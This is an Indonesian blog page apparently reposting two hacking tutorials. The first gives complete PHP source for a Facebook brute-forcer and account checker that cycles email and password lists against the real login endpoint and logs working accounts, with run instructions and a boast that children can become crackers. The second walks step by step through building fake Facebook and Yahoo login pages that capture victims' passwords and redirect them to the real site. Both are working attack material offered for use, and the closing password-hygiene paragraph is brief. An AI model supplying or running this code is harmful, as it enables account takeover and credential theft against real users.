Banyak tools yang bisa kita gunakan untuk melakukan Bruteforcing Facebook akun, jika kita search di google mungkin hasilnya akan banyak, dari yang berbayar dan tidak berbayar, tentu saja kalau mau mendowload tools tersebut harus siap dengan resiko yang tak terduga, seperti trojan, mallware atau worm, saya tidak menyarankan teman-teman untuk mendownload tools-tools tersebut, karena dalam tulisan ini saya sudah menyertakan tools gratis untuk melakukan Facebook Bruteforce, saya membuatnya dengan bahasa PHP (cuman bisa itu) jadi ga perlu khawatir dengan yang namanya virus atau trojan, berikut source codenya

Code:
"/* * Facebook Bruteforce V.1.2 * Coder : wenkhairu (c) 2012 * Blog http://khairu.net * * Cleaning up bad coding (I'm a bad coder, what can I say! * Do It Your Own Way * * for My Brother aerul_shinobi */ class Facebook{ var $file='file.txt'; var $file_email = 'email.txt'; var $dict = 'dict.txt'; var $url = 'http://www.facebook.com/'; function __construct($option){ switch($option){ case '-c': $this->logo(); $this->_cek(); break; case'-b': $this->logo(); $this->_brute_forcing(); break; default: $this->logo(); echo "[!] Eg: php facebook.class.php [option]\n"; echo "[+] option -c (cek) or -b (brute forcing)\n\n"; break; } } function logo() { print_r(' .___ .__.__ _______ .___ __| _/_______ _|__| | ________ ____ \ _ \ __| _/____ / __ |/ __ \ \/ / | | \___ // ___\/ /_\ \ / __ |/ __ \ / /_/ \ ___/\ /| | |__/ /\ \___\ \_/ \/ /_/ \ ___/ \____ |\___ >\_/ |__|____/_____ \\___ >\_____ /\____ |\___ > \/ \/ \/ \/ \/ \/ \/ Facebook Bruteforcer And Account Checker Attack v.1.2 coder : wenkhairu (c) 2012 devilzc0de for my Brother : airuel_shinobi (at) subussalam '); print "\n\n"; } function _cek_filesize($f){ if($s = filesize($f)){ if($s <= 1024) return $s." byte"; else{ if($s <= 1024*1024) { $s = round($s / 1024,2);; return $s." kb"; } else { $s = round($s / 1024 / 1024,2); return $s." mb"; } } } else return "???"; } function _do_login($email, $pass){ $login = $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,null,"email=".$email."&pass=".$pass.""); preg_match('%Set-Cookie: ([^;]+);%',$login,$hasil); $cek = $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,$hasil[1],"email=".$email."&pass=".$pass.""); preg_match_all('%Set-Cookie: ([^;]+);%',$cek,$akhir); for($i=0;$ilogin_checker($this->url,null,$cookie,null); if(preg_match_all("(]?>(.*?))i",$is_login,$loged)){ if(count($loged[0]) > 1){ echo "[+] Login Success\n"; echo "[+] Login With Email: ".$email." And Password: ". $pass."\n"; $this->good_acc("[+] Login With Email: ".$email." And Password: ". $pass."\n"); }else{ echo "[!] Login Failed\n"; } }else{ echo "[!] Login Failed\n"; } } function _cek(){ $plain = fopen($this->file,'r'); echo "[+] Dictionary Size :" .$this->_cek_filesize($this->file)."\n"; echo "[+] Please Wait ....\n"; sleep(1); echo "[+] Starting At". date('d m Y H:i:s')."\n"; while(!feof($plain)) { $cek = explode(":",trim(fgets($plain))); $username = $cek[0];$password=$cek[1]; $this->_do_login($username, $password); echo "[!] Resting... (5)s For Stable Connections\n"; sleep(10); } fclose($plain); } function _brute_forcing(){ $email_file = fopen($this->file_email,'r'); echo "[+] Dictionary Email Size :" .$this->_cek_filesize($this->file_email)."\n"; $pass_file = fopen($this->dict,'r'); echo "[+] Dictionary Password Size :" .$this->_cek_filesize($this->dict)."\n"; echo "[+] Please Wait ....\n"; sleep(1); echo "[+] Starting At". date('d m Y H:i:s')."\n"; while(!feof($email_file)) { $username = trim(fgets($email_file)); while(!feof($pass_file)) { $password = trim(fgets($pass_file)); $this->_do_login($username, $password); echo "[!] Resting... (5)s For Stable Connections\n"; sleep(10); } fclose($plain); } fclose($plain); } function login_checker($url, $header=NULL, $cookie=NULL, $post=NULL){ $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, $header); curl_setopt($ch, CURLOPT_NOBODY, $header); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) "); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); if ($post) { curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } $result = curl_exec($ch); if($result){ return $result; }else{ return curl_error($ch); } curl_close($ch); } function good_acc($log){ $file_name="good_account.txt"; $fp = fopen ($file_name, "a+"); fwrite ($fp,$log); fclose ($fp); } } $tes = new Facebook($argv[1]); ?>"
Tools tersebut akan melakukan bruteforcing dan melakukan pemeriksaan akun facebook yang sudah di ambil alih, jika akun yang di cek maupun akun yang di brute masih aktif dan berhasil login maka hasilnya akan di simpan dalam file baru dengan nama good_account.txt, cara menggunakannya cukup simple, jika pengguna windows hanya menjalankan melalui command prompt dan pastikan extensi curl pada php sudah di aktifkan, sedangkan untuk pengguna linux cukup jalankan terminal dan jangan lupa install curl tentunya, berikut cara menjalankannya

Code:
"#file bat untuk windows #untuk melakukan check akun facebook yang ada gunakan option -c #sedangkan untuk melakukan bruteforcing gunakan option -b cls C:\xampplite\php\php.exe facbook.php [option] pause #untuk linux php facbook.php [option]"
[Image: facebook.gif]

Nah cukup mudah kan menjadi seorang Cracker ? hanya dengan sedikit kemampuan anak-anak juga bisa menjadi Cracker, hanya memanfaatkan tools-tools yang bertebaran di internet siapa saja bisa menjadi siapa saja, penulis tidak bertanggung jawab atas apa yang terjadi akibat tools buatan penulis, kalo mau nyoba ya tanggung resiko sendiri ya,

Pencegahan

Cukup simple untuk mencegah akun kita di retas, bahkan dengan tools bruteforcing yang berbayar sekali pun, gunakan lah password yang tidak umum, seperti gabungan huruf dan angka, jangan gunakan password dengan nama pacara atau kata yang berasal dari informasi diri anda, gunakan password yang berbeda untuk setiap akun anda, gunakan antivirus yang bagus, dan terakhir Thanks For reading

sumber

Fake Login (Facebook) Sesukamu::Enaknya Download Gratis::

Banyak banget yang tanya sana sini, “Bagaimana seh membuat fake login?”. Mending kalo cuman itu, nanti yang lain tanya cara buat untuk Facebook, yang satu untuk Gmail, Yahoo, Blogger dan yah apa aja dah.

Pada prinsipnya sama aja, tinggal kita hanya mengganti beberapa perintah.

Penasaran?

Nah yang harus kita siapkan adalah 2 buah file yang bernama logs.php dan logs.txt (Terserah kalian lah mau kasih nama apa… ).

logs.php
Code:
 "fwrite($handle, "Date Submitted: "); fwrite($handle, "$today"); fwrite($handle, "\n"); fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++"); fwrite($handle, "\n"); fwrite($handle, "\n"); fclose($handle); echo ""; ?>"

Perhatikan, untuk kedepannya yang perlu kalian ubah adalah perintah ini

Code:
"$username = $_POST['email']; $password = $_POST['pass'];"
dan ini
Code:
"window.location=\"https://login.facebook.com/login.php?login_attempt=1\";"
Dah inget aja itu dulu, ngerti belakangan aja… Sekarang target kita maunya apa? Facebook? Oke.

Buka Facebook dan liat source codenya / CTRL+U…

[Image: 1.jpg]

Yang perlu kalian cari adalah INPUT ID dari kedua TEXT FIELD berikut



[Image: 2.jpg]

Kalo emang gak tau cara nyarinya, didalam text field tersebut kan ada tulisan Email dan Password. Copy aja dan coba search.

[Image: 3.jpg]

Done, ternyata untuk Email IDnya adalah email dan untuk Password IDnya pass. Buka logs.php dan ganti baris berikut.

Code:
"$username = $_POST['email']; $password = $_POST['pass'];"

Nah pada contoh kali ini sudah sama yaitu email dan pass (ituloh yang ada di dalam $_POST). Kemudian pada baris

Code:
"window.location=\"https://login.facebook.com/login.php?login_attempt=1\";"

Ganti URLnya jadi alamat asli atau alamat tempat sang korban ter-redirect ketika melakukan login pada Fake Login yang telah kita buat. Pada contoh kali ini adalah alamat asli login facebook.

Langkah selanjutnya adalah mengcopy seluruh source code facebook dan simpan di dalam index.php (buat dulu filenya.).

Gunakan fasilitas search dan cari kata form method dan liat action-nya.

Code:
"
"


Kalau di facebook form actionnya adalah "https://login.facebook.com/login.php?login_attempt=1" nah ganti menjadi logs.php.

Ingat, gak semua website memiliki 1 form action…Kadang ada yang punya lebih dari satu. Kalo facebook kan ada yang untuk login dan register.

[Image: 4.jpg]

Pokoknya teliti dan cari yang berhubungan sama LOGIN. Kemudian upload ketiga file tersebut dan kasih linknya ke teman kamu.

Belom ngerti juga?

Kalian harus ingat langkah – langkahnya yah…

1. Cari website yang mau dibuatin fake loginnya.

2. Cari INPUT ID dari TEXT FIELD atau tempat kita nulis email dan passwordnya.

3. Setelah dapet buka logs.php dan ganti pada bagian ini $_POST['email'];

4. Ganti juga bagian ini window.location=\"https://login.facebook.com/login.php?login_attempt=1\"; untuk me-redirect korban ketika melakukan login pada fake login kita (disarankan untuk me-redirect ke halaman login aslinya.

5. Copy keseluruhan source code dari website aslinya pada index.php dan cari form method yang berhubungan dengan login dan ganti actionnya menjadi logs.php.

6. Upload ketiga file tersebut, kasih linknya ke siapa saja dan tunggu hasilnya.

[Image: 6.jpg]

Sekarang mau target apa lagi? Yahoo? Boleh… Kita harus melakukannya sesuai langkah diatas.

Cari INPUT ID text field dari ID Yahoo!: dan Sandi:.

[Image: 5.jpg]

Ternyata untuk ID Yahoo! adalah username dan untuk Sandi adalah passwd.
Jangan lupa untuk mengcopy link asli dari Login Yahoo tersebut.

Code:
"https://login.yahoo.com/config/mail?.src=ym&.intl=id"

Buka logs.php dan ubah bagian berikut.

Code:
"$username = $_POST['username']; $password = $_POST['passwd'];"



Code:
"window.location=\"https://login.yahoo.com/config/mail?.src=ym&.intl=id\";
"

Copy keseluruhan source code dari Yahoo dan paste ke index.php. Cari form methodnya dan ganti actionnya dari

Code:
"https://login.yahoo.com/config/login?"

Menjadi

Code:
"logs.php"

Upload dan nikmati hasilnya…

Coba kalian terapkan sendiri sisanya dan semoga tutorial singkat dan gak jelas ini bisa berguna buat kalian semua…

 
sumber
 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger